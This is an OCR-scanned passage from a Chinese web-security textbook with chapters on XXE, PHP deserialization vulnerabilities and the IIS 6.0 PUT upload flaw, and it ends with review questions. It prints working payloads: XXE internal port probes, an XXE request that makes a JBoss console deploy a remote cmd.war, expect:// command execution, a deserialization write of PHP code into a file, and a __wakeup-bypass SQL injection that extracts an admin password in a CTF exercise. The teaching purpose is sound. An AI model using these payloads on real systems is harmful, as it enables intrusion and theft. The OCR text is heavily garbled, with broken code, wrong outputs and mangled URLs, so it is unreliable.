PD9waHANCQOKICByZXF 13XJDX29uY2UoJy4uL2nIYWRki5waHAnKTsNCgOKICA/Pg0KPGn0bWw+DQoJPGnIYWQ+DQoJCTx0aXRsZT5YWEUB8L3RpdGxIPg0KCTv 


IcGhwDQoJCWVjaG8gJ2hIbGrvICcgLIAKdXNIcm5hbWU7DQOJCQOKCQI'Y2hvCIBL3RhYmxPIITDQoIDQoglHJICXVpcmVfo25JZSAnLi4vZm9 vd G VL nBo: Cc7DQo 
IPg0KDQo- 
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图 9-2 读 取 文件 的 Base64 编码 内 容 


<? xml version-"1.0" ?> 

< !DOCTYPE creds [ 

< !ELEMENT username ANY» 

< !ELEMENT password ANY» 

< !ENTITY xxe SYSTEM "http://127.0.0.1:22"»]5 
«creds» 

«username» &xxe; €/username» 
«password»test«/password» 

«/creds» 


若 在 执行 完成 后 ,页面 很 快 返回 ,并 且 有 SSH 的 banner 返回 ,说 明 22 端口 开启 ,如 
图 9-3 所 示 。 


@ Load URL  [http//192.168.91.142/e/- 
n 


Š Split URL 
D Execute 
EZ Enable Postdata [] Enable Referrer 
Post data <IELEMENT password ANY > ^ 
«IENTITY xxe SYSTEM "httpy/127.0.01:22- >]> 
«credi» 
«username» Bixe;«/username» v 


Follow @ctfs-wiki 


XXE 


input xml 


| warning: 
jvarfwewihimiexe/index pho on ine 21 


z 


22a 


tanec to open syeanr HTTP request iailed 35,2 0-Open3SH 33. 


图 9-3 探测 内 网 22 端口 是 否 开启 
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探测 23 端口 是 否 开 启 的 payload 如 下 : 


«?xml version-"1.0" ?> 

< ! DOCTYPE creds [ 

< !ELEMENT username ANY» 

X!ELEMENT password ANY» 

< !ENTITY xxe SYSTEM "http://127.0.0.1:23"»]» 
«creds» 

«username» &xxe;«/username» 

«password»test« /password» 

«/creds» 


若 在 执行 完成 后 ,页面 返回 很 慢 , 并 且 有 以 下 报错 信息 :“failed to open stream: 
Connection refused”, 说 明 23 端口 未 开启 ,如 图 9-4 所 示 o 


@ Load URL |htpV/19215891.142hoee/ 
À spun. 


DE 


Enable Post data C] Enable Referrer 


Post data <IELEMENT password ANY > a 
<IENTITY xoe SYSTEM "httpi//127.0.0.123* >]> 

«creds» 

«username» &ixxe; «username». x. 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 


XXE 


input xml 


= Cai 
enine 21 


图 9-4 探测 内 网 23 端口 是 否 开启 


9.3.3 内 网 应 用 攻击 


通过 XXE 漏洞 对 内 网 应 用 进行 攻击 。 
例如 ,可 以 利用 以 下 攻击 代码 对 内 网 jmx 控制 台 未 授权 访问 的 JBoss 漏洞 进行 攻击 : 


«?xml version-"1.0" ?> 

«!DOCTYPE creds [ 

«!ELEMENT username ANY? 

< !ELEMENT password ANY? 

< !ENTITY xxe SYSTEM "http://127.0.0.1:8080/jmx- console/HtmlAdaptor? action= 
invokeOp&name-jboss.deployment:type-DeploymentScanner, flavor=URL&methodIndex= 
7&arg0=http://10.2.7.11/cmd.war">]> 

<creds> 
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«username» &xxe; «/username» 
«password»test« /password» 
</creds> 


934 命令 执行 
利用 XXE 漏洞 可 以 调用 except: // 伪 协议 调用 系统 命令 。 例 如 : 


<?xml version="1.0" ?> 

< !DOCTYPE creds [ 

< !ELEMENT username ANY> 

< !ELEMENT password ANY» 

< !ENTITY xxe SYSTEM "except://id">]> 
<creds> 

<username> &xxe;«/username» 
<password> test</password> 

</creds> 


94 XML 漏洞 修复 


XML 漏洞 修复 有 以 下 两 种 方法 : 

CD 禁用 外 部 实体 。 在 代码 中 设置 libxml_disable_entity_loader(true)。 

(2) 过 滤 用 户 提 交 的 XML 数据 。 过 滤 关 键 词 为 <!DOCTYPE、 <! ENTITY, 
SYSTEM fil PUBLIC, 


9.5 思考 题 


. 什么 是 XXE 漏洞 ? 

. XXE 漏洞 有 哪些 危害 ? 

. 简 述 XXE 漏洞 形成 的 原因 。 

. XXE 漏洞 的 利用 方法 有 哪 几 种 ? 

. 如 何 利用 XXE 漏洞 进行 文件 读 取 ? 

. 如 何 利用 XXE 漏洞 进行 内 网 探测 ? 

. 如 何 利用 XXE 漏洞 进行 内 网 应 用 攻击 ? 
. XXE 漏洞 的 修复 方法 有 哪些 ? 


@ — Ó m £= Q@ t D> 
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10 = 
LETT 


10.1 ”序列 化 和 反 序列 化 简介 


为 了 有 效 地 存储 或 传递 数据 ,同时 不 丢失 其 类 型 和 结构 ,经 常 需要 利用 序列 化 和 反 序 
列 化 函数 对 数据 进行 处 理 。 

序列 化 函数 返回 字符 串 , 此 字符 串 包含 了 表示 值 的 字 节 流 , 可 以 存储 于 任何 地 方 。 

反 序 列 化 函数 对 单一 的 已 序列 化 的 变量 进行 操作 ,将 其 转换 回 原来 的 值 。 

这 两 个 过 程 结合 起 来 ,可 以 轻松 地 存储 和 传输 数据 ,使 程序 更 具 维 护 性 。 

PHP 语言 中 常用 的 序列 化 和 反 序 列 化 函数 有 serialize、unserialize、json_encode 和 


json_decode。 
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10.21 serialize 函数 


serialize 是 序列 化 函数 。 
当 序 列 化 对 象 时 ,PHP 在 序列 化 动作 之 前 调用 该 对 象 的 成 员 函 数 __sleep。 这 样 就 允 
许 对 象 在 被 序列 化 之 前 做 任何 清除 操作 。 


10.22 NULL 和 标量 类 型 数据 的 序列 化 
NULL 和 标量 类 型 数据 的 序列 化 是 最 简单 的 ,也 是 构成 复合 类 型 序列 化 的 基础 。 


1. NULL 的 序列 化 
在 PHP 中 ,NULL 被 序列 化 为 N。 
NULL 序列 化 示例 如 下 : 


«?php 

S$t-NULL; 

$tr-serialize($t); 

print "序列 化 NULL 的 结果 为 ".$tr; 


z> 
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输出 如 下 : 
序列 化 NULL 的 结果 为 N 


2. boolean 型 数据 的 序列 化 

boolean 型 数据 被 序列 化 为 b: —digit. dtrp.-— digits 0 或 1。 当 boolean 型 
数据 为 false 时 ,一 digit 之 为 0, 否则 为 1. 

boolean 型 数据 序列 化 示例 如 下 : 


«?php 

$t-true; 

$f-false; 

$tr-serialize($t); 

print "序列 化 true 的 结果 为 " Str; 
$fa-serialize($f); 

print "序列 化 false 的 结果 为 ". $fa; 


ED 


输出 如 下 : 


序列 化 true 的 结果 为 p:1 
序列 化 false 的 结果 为 bp:0 


3. integer 型 数据 的 序列 化 

integer 型 ( 整 型 ) 数 据 被 序列 化 为 i: — number, HF ,<number> 2g —4 SX, 
范围 为 一 2 147 483 648 一 2 147 483 647 ,数字 前 可 以 有 正 负 号 。 如 果 被 序列 化 的 数字 超 
过 这 个 范围 , 则 会 被 序列 化 为 浮 点 型 而 不 是 整 型 。 如 果 序 列 化 后 的 数字 超过 这 个 范围 
(PHP 本 身 序列 化 时 不 会 发 生 这 个 问题 ), 则 反 序列 化 时 不 会 返回 期 望 的 数值 。 

integer 型 数据 序列 化 示例 如 下 : 

«?php 

$i-123; 

$tr-serialize($i); 


print "序列 化 integer 型 数据 123 的 结果 为 ". Str; 


E 


输出 如 下 : 
序列 化 integer 型 数据 123 的 结果 为 i:123 


4. double 型 数据 的 序列 化 
double 型 ( 浮 点 型 ) 数 据 被 序列 化 为 d: — number, HrB.-—number H —4 i$ X. 
数 , 其 范围 与 PHP 的 浮 点 数 范围 一 样 ,可 以 表示 成 整数 形式 、 浮 点 数 形式 和 科学 记 数 法 
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形式 。 如 果 序列 化 无 穷 大 , 则 二 number> 为 INF; 如 果 序 列 化 负 无 穷 大 , 则 二 number> 为 
一 INF。 如 果 序 列 化 后 的 数字 超过 PHP 能 表示 的 最 大 值 , 则 反 序 列 化 时 返回 无 穷 大 
(INF) ;如 果 序 列 化 后 的 数字 小 于 PHP. 所 能 表示 的 最 小 精度 , 则 反 序 列 化 时 返回 0; 如果 
被 序列 化 的 数据 为 非 数 字 , 则 被 序列 化 为 NAN, NAN 反 序 列 化 时 返回 0, 其 他 语言 可 以 
将 NAN 反 序列 化 为 相应 语言 所 支持 的 NAN 表示 形式 。 

double 型 数据 的 序列 化 示例 如 下 : 

<? php 

header("Content-type: text/html; charset-utf-8"); 

$d=1.5; 

$tr-serialize($d); 


print "序列 化 double 型 数据 1.5 的 结果 为 ".$tr; 


? > 


输出 如 下 : 


序列 化 double 型 数据 1.5 的 结果 为 d:1.5 


5. string 型 数据 的 序列 化 

string 型 (字符 串 型 ) 数 据 被 序列 化 为 s: length: "<value>>" , 
string 型 数据 的 序列 化 示例 如 下 : 

«?php 

header("Content-type: text/html; charset-utf-8"); 
$s-'test'; 

$tr-serialize($s); 


print "序列 化 string 型 数据 test 的 结果 为 ".$tr; 


o 


输出 如 下 : 


序列 化 string 型 数据 test 的 结果 为 s:4:"test" 


10.2.3 简单 复合 类 型 数据 的 序列 化 


PHP 中 的 复合 类 型 有 数组 (array) 和 对 象 (object) 两 种 ,本 节 主 要 介绍 在 简单 情况 下 
这 两 种 类 型 数据 的 序列 化 格式 。 


1. 数组 的 序列 化 
数组 通常 被 序列 化 为 


a:<n>:{<key 1»«value 1><key 2><value 2>…<key n><value n>) 


其 中 ,一 n 才 表示 数组 元 素 的 个 数 , 二 key 17. key 2>, =, key n 放 表示 数组 下 标 ， 
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<value 17, « value 27» ,**: , «value 7 全 表 示 与 下 标 相 对 应 的 数组 元 素 的 值 。 


下 标的 类 型 只 能 是 整 型 和 字符 串 型 (包括 Unicode 字符 串 型 ) 。 数 组 序列 化 后 的 格式 


与 整 型 和 字符 串 型 数据 序列 化 后 的 格式 相同 。 


数组 元 素 值 可 以 是 任意 类 型 ,其 序列 化 后 的 格式 与 其 所 对 应 的 类 型 序列 化 后 的 格式 


相同 。 


数组 序列 化 示例 如 下 : 


<?php 

header ("Content-type: text/html; charset=utf-8"); 
$cars=array ("Volvo", "BMW", "SAAB"); 
$tr-serialize($cars); 

print "序列 化 数组 数据 cars 的 结果 为 ".$tr; 


7> 


输出 如 下 : 

序列 化 数组 数据 cars 的 结果 为 a:3:(i:0;s:5:"Volvo";i:l;s:3:"BMW";i:2;s:4: 
"SAAB"; } 

2. 对 象 的 序列 化 

对 象 通常 被 序列 化 为 


O:<length>:"<class name>":<n>:{<field name 1><field value 1><field name 2» 
«field value 2>…<field name n»«field value n») 


HP, length RRI R 8928 44 88 FEKE; <class name X zn XE RRE ; <n> 
表示 对 象 中 的 字段 个 数 ,这 些 字 段 包括 在 对 象 所 在 类 及 其 祖先 类 中 用 var, public, 
protected 和 private 声明 的 字段 ,但 是 不 包括 用 static 和 const 声明 的 静态 字段 ,也 就 是 
说 只 有 实例 (instance) 字 段 ; 二 field name 17, — field name 2 二 ,… ,一 field name n> 7R 
每 个 字段 的 字段 名 ,二 field value 1>,< field value 27 ,**:, — field value n> RR 5j ^ Et 
名 对 应 的 字段 值 。 
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字段 名 是 字符 串 型 ,序列 化 后 的 格式 与 字符 串 型 数据 序列 化 后 的 格式 相同 。 
字段 值 可 以 是 任意 类 型 ,序列 化 后 的 格式 与 其 所 对 应 的 类 型 序列 化 后 的 格式 相同 。 
对 象 序列 化 示例 如 下 : 


«?php 

header ("Content-type: text/html; charset-utf-8"); 
class Foo ( 

public $aMemberVar- 'aMemberVar Member Variable'; 
public S$aFuncName- 'aMemberFunc'; 

function aMemberFunc() ( 

print 'Inside "aMemberFunc()''; ) 
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3. 

$foo=new Foo; 

$tr=serialize($foo); 

print "序列 化 对 象 数据 Foo 的 结果 为 ". Str; 


p 


输出 如 下 : 


序列 化 对 象 数据 Foo 的 结果 为 0:3:"Foo":2:(s:10:"aMemberVar";s:26:"aMemberVar 
Member Variable";s:9:"aFuncName";s:11:"aMemberFunc";) 


其 中 ,O 表示 object. 3 表示 对 象 的 类 名 的 字符 串 长 度 为 3,Foo 表示 对 象 的 类 名 是 Foo, 2 
表示 有 两 个 数据 字段 (类 成 员 ) 。 

(s: 10: "aMemberVar";s: 26; "aMemberVar Member Variable" ;s: 9; "aFuncName"; 
s: 11; "aMemberFunc";) 表示 具体 的 数据 字段 与 字段 值 。 

第 一 个 字段 s: 10: "aMemberVar";s:; 26; "aMemberVar Member Variable" & Y. 
如 下 : 

s: 10: "aMemberVar" 表 示 字 段 的 类 型 是 s(string) ,字段 长 度 是 10 ,字段 的 名 称 是 
aMemberVar。 

s: 26; "aMemberVar Member Variable" 表 示 字 段 值 的 类 型 是 s( string) ,字段 值 长 度 
是 26 ,字段 值 是 aMemberVar Member Variable, 

第 二 个 字段 s: 9; "aFuncName";s: 11; "aMemberFunc" 含 义 如 下 : 

s: 9; "aFuncName" 表 示 字 段 的 类 型 是 s(string), 字 段 长 度 是 9, 字段 的 名 称 是 
aFuncName, 

s: 11; "aMemberFunc" 表 示 字 段 值 的 类 型 是 sCstring) ,字段 值 长 度 是 11 ,字段 值 是 


aMemberFunc, 
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unserialize 是 反 序 列 化 函数 。 

车 被 序列 化 的 变量 是 一 个 对 象 ,在 重新 构造 对 象 之 后 ,会 自动 调用 wakeup W 51 PR 
数 ( 如 果 存 在 )。 

反 序 列 化 对 象 示例 如 下 : 


«?php 
header("Content-type: text/html; charset-utf-8"); 
class Foo { 
public $aMemberVar- 'aMemberVar Member Variable'; 
public $aFuncName-'aMemberFunc'; 
function aMemberFunc() ( 
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print 'Inside "aMemberFunc()"'; 

) 
} 
$tr-'0:3:"Foo":2:(s:10:"aMemberVar";s:26:"aMemberVar Member Variable";s:9: 
"aFuncName";s:11:"aMemberFunc";]'; 
$ttr-unserialize($tr); 
var dump ($ttr); 
T> 


得 到 以 下 结果 : 


object (Foo)#1 (2) { 
["aMemberVar"]=> 
string(26) "aMemberVar Member Variable" 
["aFuncName"]=> 
string(11) "aMemberFunc" 
) 


10... EFFI SS TIR 


反 序 列 化 漏洞 的 产生 主要 有 以 下 两 个 原因 : 
(1) unserialize 函数 的 参数 可 控 。 
(2) 存在 魔法 函数 。 


10.4.1 魔法 函数 


__construct、_destruct、_call、_callStatic、_get、_set、__isset、_unset、_sleep、 
. wakeup, toString, invoke, set state, clone fl debugInfo 等 成 员 函 数 在 PHP 
中 被 称 为 魔法 函数 。 在 命名 自己 的 类 方法 时 不 能 使 用 这 些 名 称 ,除非 是 想 使 用 其 魔法 函 
数 功能 。 

PHP 将 所 有 以 _ (两 个 下 画 线 ) 开 头 的 函数 保留 为 魔法 函数 ,所 以 在 定义 类 方法 时 不 
要 以 _ 为 前 级 。 


10.4.2 _ construct 函数 和 __destruct 函数 


1. _ construct 函数 
. construct 函数 的 用 法 如 下 : 


void  construct([mixed $args[, $...]]) 


PHP 5 允许 开发 者 在 一 个 类 中 定义 一 个 方法 作为 构造 函数 。 具 有 构造 函数 的 类 会 
在 每 次 创建 新 对 象 时 先 调 用 此 方法 ,所 以 __construct 函数 非常 适合 在 使 用 对 象 之 前 做 一 
些 初 始 化 工作 。 
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2.  destruct 函数 
. destruct 函数 的 用 法 如 下 : 


void _ destruct (void) 


PHP 5 引入 了 析 构 函数 的 概念 ,这 类 似 于 其 他 面向 对 象 的 语言 ,如 C++ 。 析 构 函 数 
会 在 对 某 个 对 象 的 所 有 引用 都 被 删除 或 者 对 象 被 显 式 销毁 时 执行 。 


3. 示例 代码 
. construct 函数 和 _ destruct 函数 的 示例 代码 如 下 : 


<? php 
class MyDestructableClass { 
function __construct() { 
print "In constructor\n"; 
$this->name="MyDestructableClass"; 


} 


function _ _destruct() { 
print "Destroying " . $this->name . "\n"; 
} 
} 
$obj=new MyDestructableClass (); 
Lr» 


输出 如 下 : 


In constructor 
Destroying MyDestructableClass 


创建 MyDestructableClass 类 的 新 对 象 时 ,会 调用 __construct 函数 ,输出 In constructor; 
对 象 被 销毁 时 ,会 调用 __destruct 函数 ,输出 Destroying MyDestructableClass。 


10.4.3 sleep 函数 和 __wakeup 函数 


1. _ sleep 函数 

serialize 函数 会 检查 类 中 是 否 存 在 __sleep 函数 。 如 果 存 在 ,该 函数 会 先 被 调用 , 然 
后 才 执 行 序列 化 操作 。 此 功能 可 以 用 于 清理 对 象 , 并 返回 一 个 包含 对 象 中 所 有 应 被 序列 
化 的 变量 名 称 的 数组 。 如 果 该 函数 未 返回 任何 内 容 , 则 NULL 被 序列 化 ,并 产生 一 个 
E NOTICE 级 别 的 错误 。 

_ sleep 函数 不 能 返回 父 类 的 私有 成 员 的 名 字 。 这 样 做 会 产生 一 个 EE_NOTICE 级 别 
的 错误 。 该 函数 可 以 用 serializable 接口 来 替代 。 

__sleep 函数 常用 于 提交 未 提交 的 数据 或 进行 类 似 的 清理 操作 。 同 时 ,如 果 有 一 些 很 
大 的 对 象 , 但 不 需要 全 部 保存 , 则 使 用 此 功能 比较 好 。 
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2.  wakeup 函数 

unserialize 函数 会 检查 是 否 存在 _ wakeup 函数 。 如 果 存在 , 则 会 先 调用 ^ wakeup 
函数 ,预先 准备 对 象 需要 的 资源 。 

_ wakeup 函数 经 常用 在 反 序列 化 操作 中 ,例如 ,重新 建立 数据 库 连 接 或 执行 其 他 初 
始 化 操作 。 


3. 示例 代码 
__sleep 函数 和 ”wakeup 函数 的 示例 代码 如 下 : 


输出 如 下 : 


反 序 列 化 后 ,会 自动 调用 _wakeup 函数 ,输出 wakeup。 序 列 化 对 象 后 ,会 自动 调用 
sleep 函数 ,输出 sleep. 
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Er 反 序 列 化 漏洞 示例 代码 分 析 


反 序 列 化 漏洞 示例 代码 如 下 : 


10.5.1 漏洞 分 析 


以 上 代码 中 存在 反 序 列 化 漏洞 的 原因 如 下 : 

(1) unserialize 函数 的 参数 $ class 可 控 。 

(2) f£1E | destruct 函数 ,此 函数 会 将 $ this test 的 值 写 人 /var/www/html/hello. 
php 文件 。 


10.5.2 漏洞 利用 


通过 参数 re 传人 的 值 要 实例 化 为 a, 并 且 改变 $ test 的 值 。 

因为 、 destruct 函数 可 以 将 $ test 的 值 写 人 hello. php 文件 中 ,所 以 可 以 利用 该 函数 
将 PHP 代码 传人 hello. php 文件 中 。 

首先 实例 化 对 象 : 


输出 如 下 : 
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0:1:"a":1:(s:4:"test";s:18:"«? php phpinfo();?»";) 


正常 访问 以 下 地 址 : 


http://www.ctfs-wiki.com/index.php 


输出 源码 和 hello, 如 图 10-1 所 示 。 


<?php 
highlight file( FILE ): 
class a { 


var $test = 'hello'; 
function | destructÓ ( 
$fp = fopen("/var/www/html/hello. php”, ^w^) ; 
fputs ($fp, $this-^test) ; 
fclose ($fp); 
} 
} 
$class = stripslashes($_GET[ re’ ]) ; 
$class unser = unserialize ($class) ; 


require '/var/www/html/hello.php'; 


D 
hello 
10-1 正常 访问 的 返回 效果 
将 POC 传人 re 参数 中 : 


http://www.ctfs-wiki.com/index.php?re-0:1:"a":1:(s:4:"test";s:18:"«? php 
phpinfo();?»";) 


访问 后 ,会 将 二 ?php phpinfoO ;?7 5 A hello. php ,如 图 10-2 所 示 。 


会 “€ © | http//www.ctfs-wiki.com/serialize 


<?php 
highlight file( FILE ); 
class a Í 
var $test = "'hello'; 
function _ destructO { 
$fp = fopen( /var/www/html/hello. php^, ^w^) ; 
fputs ($fp, $this->test); 
fclose($fp): 
) 
} 
$class = stripslashes($_GET[ re ]); 
$class unser = unserialize ($class) ; 
require '/var/www/html/hello. php ; 


?> 
hello 


10-2 ”将 反 序 列 化 攻击 脚本 写 人 文件 


访问 http: // www. ctfs-wiki. com/hello. php ,输出 phpinfo, 如 图 10-3 所 示 。 
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图 10-3 访问 hello. php 输出 phpinfo 


Wo 反 序列 化 漏洞 利用 实例 详解 


本 节 针 对 以 下 代码 详细 讲解 反 序列 化 漏洞 利用 方法 。 
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mysql_close ($this->conn); 
} 
function __destruct() { 
$this-»  conn(); 
if (in array($this-»method, array("show", "login", "source"))) ( 
@call user func array(array(S$this, $this-»method), $this-»args); 
) else ( 
$this-»  die("What do you do? "); 
) 
$this-»  close(); 
) 
function _ wakeup() { 
foreach ($this-»args as $k =>$v) ( 
$this-»args[$k] -strtolower(trim(mysql escape string($v))); 
) 
) 
) 
if(isset($ GET["data"])) { 
Gunserialize($ GET["data"]); 
) else ( 
new WEB("source", array()); 


) 


本 实例 的 主要 考察 点 为 反 序列 化 漏洞 和 SQL 注入 漏洞 。 
10.6.1 漏洞 分 析 


首先 判断 有 没有 传人 GET 型 的 数据 。 

如 果 传人 了 GET 型 的 数据 ,unserialize 函数 首先 会 检查 有 没有 __ wakeup 函数 。 然 
后 调用 __destruct 函数 ,在 此 函数 中 判断 是 否 传 人 了 show login source。 如 果 传 入 的 是 
show, 就 会 调用 show 函数 ,该 函数 的 主要 功能 是 进行 SQL 查询 ;如 果 传人 的 是 login ,就 
会 调用 login 函数 ,该 函数 的 主要 功能 是 通过 用 户 名 、 密 码 登 录 后 输出 flag; 如 果 传人 的 是 
source, 就 会 调用 source 函数 ,显示 源 代码 。 

如 果 没 有 传人 GET 型 的 数据 ,会 创建 对 象 并 且 传 人 source。 创 建新 对 象 时 , 先 调用 
__construct 函数 ,该 函数 会 调用 _conn 函数 进行 数据 库 初始 化 ,最 后 调用 __destruct PR 
数 , 因 为 传人 的 是 source, 所 以 会 调用 source 函数 ,显示 源 代码 。 


10.6.2 漏洞 利用 


通过 GET 型 的 data 参数 传人 反 序 列 化 后 的 payload, 通 过 login 函数 成 功 登 录 后 输 
出 flag。 
login 函数 成 功 通过 mysql escape string 函数 对 用 户 名 和 密码 进行 了 过 滤 , 不 存在 
注入 ,所 以 登录 时 需要 知道 role 是 admin 的 用 户 名 和 密码 。 
show K% rj Hi Y SQL 语句 ,并 且 没 有 过 滤 ,所 以 可 以 通过 show 函数 利用 SQL 注 
人 漏洞 获取 role 是 admin 的 用 户 名 和 密码 的 信息 。 
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目前 只 有 data 参数 可 控 , 所 以 只 能 传人 反 序 列 化 的 SQL 注入 语句 进行 攻击 。 

unserialize 函数 首先 检查 有 没有 __ wakeup 函数 , 若 有 ,会 优先 调用 该 画 数 。 在 
__wakeup 函数 中 ,mysql_escape_string 函数 会 对 输入 的 语句 进行 过 滤 , 但 是 该 函数 存在 
CVE-2016-7124 绕 过 漏洞 ,利用 这 个 漏洞 可 以 跳 过 _wakeup 的 执行 。 


1. 获得 登录 用 户 密码 
利用 show 函数 中 存在 的 SQL 注入 漏洞 ,获取 的 role 是 admin 的 密码 信息 。 使 用 
. conn 函数 构造 以 下 payload: 
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payl 


foreach (Sthis->args as $k=> $v) ( 
$this-»args[$k]-strtolower(trim(mysql escape string($v))); 


) 

$args-array("bla' union select password, username, password from users where 
username-'orange'---"); 

$class-new WEB ("show", $args); 

$class ser-serialize($class); 


var dump($class ser); 


输出 如 下 : 


string(181) 
"0:3:"Web":3:(s:11:"[ ]Web[ ]nethod"; s:4:"show";s:9:"[ ]Web[ args";a:1:(i:0; 
s:83:"bla' union select password, password, password from users where username- 


'orange'---";]s:9:"[ ]Webl]conn";i:0; )" 


输出 中 的 口 是 对 %00 进行 了 编码 ,所 以 要 将 口 蔡 换 为 %00。 


"0:3:"Web":3:(s:11:"$ 00Web$ 0O0method"; s:4:"show";s:9:"$ 00Web$ O0args";a:1: 
(i:0;5:83:"bla' union select password, password, password from users where 
username-'orange'---";]s:9:"$00Web$ 00conn";i:0;)" 


为 了 绕 过 __wakeup 函数 ,要 将 对 象 属性 个 数 的 值 改 为 比 真 实 值 大 的 值 ,所 以 最 终 的 
oad 为 


"0:3:"Web":4:{s:11:"%00Web% 00method"; s:4:"show";s: 
(i:0;5:83:"bla' union select password, password, password from users where 


:"$ 00Web$ 00args";a:1: 


username-'orange'---";]s:9:"$ 00Web$ 00conn";i:0;)" 


输入 以 下 测试 语句 : 


http://www.ctfs- wiki. com/index. php? data = O: 3:" Web": 4: (s: 11:"% 00Web% 
00method";s:4:"show";s:9:"$ 00Web£$00args";a:1:(i:0;5s:83:"bla' union select 
password,password,password from users where username-'orange'---";]s:9:"$ 
00Web$00conn";i:0;) 


返回 msg "mall123mall is mall123mall" ,得 到 密码 mall123mall, 如 图 10-4 所 示 。 


w ii 
Ë se 
D Bee 


EE 


URL Trew whl coinde pho latos OE WE E T THANED ROO SE ov" S8 RODWED ADO a REIS T UG uron sasa porde paerd som uers Where sernames orange S KOINEA T 
va. 


C Enable post oea C Enable Referer 
Bene | 天 
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图 10-4 得 到 密码 mall123mall 
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2. 登录 后 获得 flag 
得 到 用 户 名 、 密 码 后 ,利用 login 函数 登录 ,获得 flag. 
构造 以 下 payload: 


me Web 安全 原理 分 析 与 实践 me 


E 3 DUE SMS LEUTE 


$class-new WEB ("login", $args); 
$class ser-serialize($class); 
print r($class ser); 


得 到 


0:3:"Web":3:(s:11:"$00Web$ 00method";s:5:"login";s:9:"$ 00Web$ 00args";a:2: 
(i:0;s:6:"orange";i:1;s:11:"mall123mall"; )s:9:"$00Web$ 00conn";i:0;) 


代码 中 ifC $ username — 'orange'| | stripos( $ sql, 'orange? ! = false) fj Xf orange 
的 用 户 名 的 判断 ,可 以 用 A、A 实现 绕 过 。 
得 到 最 终 的 payload; 


0:3:"Web":3:(s:11:"$00Web$ 00method"; s:5:"login";s:9:"$ 00Web$ 0O0args";a:2: 
(i:0;s:7:"orÁnge";i:1;s:11 :"malll23mall";)s:9:"$00Web£00conn";i:0;] 


输入 以 下 测试 语句 : 


http://www.ctfs- wiki. com/index. php? data = 0: 3:$ 22Web$ 22: 3: (s: 11:$ 22% 
00Web$00method$22;s:5:$2210gin$22;s:9:$22$00Web£$00args$22;a:2:(i:0;8s:7:$ 
220r$C3$83nge$22;i:1;5s:11:$22ma11123ma11$22;)s:9:$ 22$ 00Web$ 00conn$ 22;i:0;} 


即 可 获得 flag: *HITCON (php 4nd mysql are s0 maglc, isn't it?}”, 如 图 10-5 所 示 o 


deem at laoree ehe te DKW ITIN IE M NEMORE TINT TS SA Ag N2 S ZOE MIT m7 Oe IS ACTAE TT v1 Wl TAI TE A NTTW TA orn? 


图 10-5 获得 flag 


107 ”思考 题 


> 


什么 是 序列 化 ? 

什么 是 反 序列 化 ? 

什么 是 反 序 列 化 漏洞 ? 

反 序 列 化 漏洞 利用 的 条 件 有 哪些 ? 
什么 是 魔法 函数 ? 常见 的 魔法 函数 有 哪些 ? 
简 述 __construct 函数 的 功能 及 使 用 方法 。 
简 述 _destruct 函数 的 功能 及 使 用 方法 。 
简 述 _sleep 函数 的 功能 及 使 用 方法 。 

简 述 _wakeup 函数 的 功能 及 使 用 方法 。 
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IIS 服务 器 简介 


互联 网 信息 服务 (Internet Information Services, IIS) 是 由 微软 公司 提供 的 基于 
Windows 的 互联 网 基本 服务 。IIS 最 初 是 
Windows NT 版 本 的 可 选 包 ,随后 内 置 在 
Windows 2000, Windows XP Professional 和 
Windows Server 2003 中 发 行 ,但 在 Windows 
XP Home 版 本 上 并 没有 IIS。IIS 是 一 种 Web 
服务 组 件 ,其 中 包括 Web 服务 器 .FTP 服务 器 、 
NNTP 服务 器 和 SMTP 服务 器 ,分 别 用 于 网 页 
浏览 .文件 传输 .新 闻 传 输 和 邮件 发 送 等 方面 ， 
IIS 标识 如 图 11-1 所 示 。 

不 同 版 本 的 Windows 操作 系统 对 应 不 同 版 本 的 IS, 如 表 11-1 所 示 。 


internet information services 


图 11-1 IIS 标识 


表 11-1 IIS 版 本 
IIS 版 本 Windows 版 本 备 注 
IIS 1.0 Windows NT 3.51 Service Pack 3s@bk 
IIS 2.0 Windows NT 4. 0s(àbk 
IIS3.0 | Windows NT 4. 0 Service Pack 3 开始 支持 ASP 的 运行 环境 
IIS 4.0 Windows NT 4.0 Option Pack 支持 ASP 3.0 
在 安装 相关 版 本 的 . NET FrameWork 的 
IIS 5.0 | Windows 2000 RunTime 之 后 ,可 支持 ASP. NET 1. 0/1. 1/ 
2. 0 的 运行 环境 
Windows Server 2003 
IIS 6.0 Windows Vista Home Premium 
Windows XP Professional x64 Editions@bk 
Windows Vista 
IIS 7.0 Windows Server 2008s@bkIIS 在 系统 中 已 经 集成 了 . NET 3. 5。 可 以 支 


Windows 7 


持 . NET 3.5 及 以 下 的 版 本 
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| H2  II6.0 PUT 上 传 漏洞 


HS 6.0 PUT 上 传 漏洞 是 比较 经 典 的 TIS 漏洞 ,如 果 IIS 开启 了 PUT 上传 方 法 ,就 可 
以 利用 此 方法 上 传 任意 文件 ,因此 ,该 漏洞 危害 极 大 。 


11.2.1 漏洞 产生 原因 


IIS 6.0 PUT 上 传 漏洞 产生 的 原因 有 两 个 : 
(1) IIS Server 在 Web 服务 扩展 中 开启 了 WebDAV., 
(2) IIS 配置 了 可 以 写 和 人 的 权限 。 


11.2.2 WebDAV 简介 


WebDAV 是 一 种 基于 HTTP 1. 1 的 通信 协议 。 它 扩展 了 HTTP 1. 1, 在 GET, 
POST.HEAD.PUT.MOVE 等 几 个 HTTP 标准 方法 以 外 添加 了 一 些 新 的 方法 ,使 应 用 
程序 可 对 Web 服务 器 直接 进行 读 写 ,并 支持 写 文件 锁定 (lock) 及 解锁 (unlock) ,还 支持 文 
件 的 版 本 控制 。 


11.2.3 漏洞 测试 方法 


利用 OPTIONS 方法 检测 是 否 开启 了 WebDAV。 通 过 HTTP 发 包工 具 发 送 如 下 
LES 


OPTIONS / HTTP/1.1 
Host: www.ctfs-wiki.com 


如 果 有 如 下 的 DAV 开启 信息 返回 ,说 明 开 启 了 WebDAV, 


HTTP/1.1 200 OK 

Date: Tue, 27 Mar 2018 00:15:36 GMT 

Server: Microsoft-IIS/6.0 

MicrosoftOfficeWebServer: 5.0 Pub 

X-Powered-By: ASP.NET 

MS-Author-Via: MS-FP/4.0,DAV 

Content- Length: 0 

Accept-Ranges: none 

DASL: «DAV:sql» 

DAV: 1, 2 

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, 
PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 

